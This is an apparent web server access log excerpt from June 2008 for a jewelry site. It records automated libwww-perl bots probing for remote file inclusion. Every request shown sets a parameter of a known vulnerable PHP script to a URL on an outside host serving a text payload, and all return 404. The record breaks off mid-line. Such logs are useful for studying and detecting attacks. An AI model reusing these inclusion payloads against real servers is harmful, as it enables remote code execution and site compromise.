83.98.156.151 - - [30/Jun/2008:21:51:56 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:52:03 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:52:07 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:52:10 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:52:15 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:52:15 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:52:15 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.89.21.71 - - [30/Jun/2008:21:52:31 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.21.71 - - [30/Jun/2008:21:52:31 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:52:32 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:52:32 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:52:32 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:52:53 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:52:53 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:52:53 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:53:37 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:53:37 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:53:40 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.11.67.242 - - [30/Jun/2008:21:54:00 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Jun/2008:21:54:00 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Jun/2008:21:54:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:54:13 -0700] "GET /logs/access_080531.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:54:30 -0700] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:54:46 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:54:46 -0